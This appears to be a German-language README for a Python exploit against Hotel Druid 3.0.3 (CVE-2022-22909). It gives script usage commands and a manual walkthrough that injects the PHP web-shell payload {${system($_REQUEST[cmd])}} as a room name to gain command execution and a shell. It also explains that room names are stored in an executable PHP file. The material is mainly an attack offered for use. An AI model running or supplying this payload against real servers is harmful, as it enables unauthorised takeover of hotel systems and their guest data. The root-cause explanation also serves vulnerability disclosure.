
Python-basierter Exploit für Hotel Druid 3.0.3 Remote-Codeausführung (CVE-2022-22909). Injiziert PHP-Payloads über Zimmernamen, um Befehlsausführung und Shell-Zugriff auf anfällige Ziele zu erreichen.
Dieser Exploit erstellt einen neuen Raum mit unserem PHP-Payload als Raumnamen.
Verwendung:
$ ./HotelDruidExploit.py -h

$ ./HotelDruidExploit.py -u http://127.0.0.1/hoteldruid

Dieser Exploit funktioniert, wenn Sie den Raumnamen bereits kennen.
Verwendung:
$ ./HotelDruidExploitRoom.py -u "http://127.0.0.1/hoteldruid" -r "abc"

1). Navigieren Sie zur Hotel Druid-Seite.
2). Klicken Sie auf Tabellen -> Räume

3). Fügen Sie im Feld „Neuen Raum erstellen“ den folgenden PHP-Code ein und klicken Sie auf „Hinzufügen“.
{${system($_REQUEST[cmd])}}

4). Sie sehen einen neuen Raum mit unserem Payload im Feld „Raumname“.

5). Rufen Sie den folgenden Link auf und Sie erhalten eine Befehlsausführung. Später können Sie eine vollständige Shell erhalten.
Hinweis: Ersetzen Sie die IP durch die IP Ihres Hotel-Druid-Ziels.
Diese Schwachstelle tritt auf, weil Raumnamen in /var/www/html/hoteldruid/dati/selectappartamenti.php gespeichert werden.

Und selectappartamenti.php ist eine PHP-Datei, daher wird jeder PHP-Code in dieser Datei vom Server ausgeführt.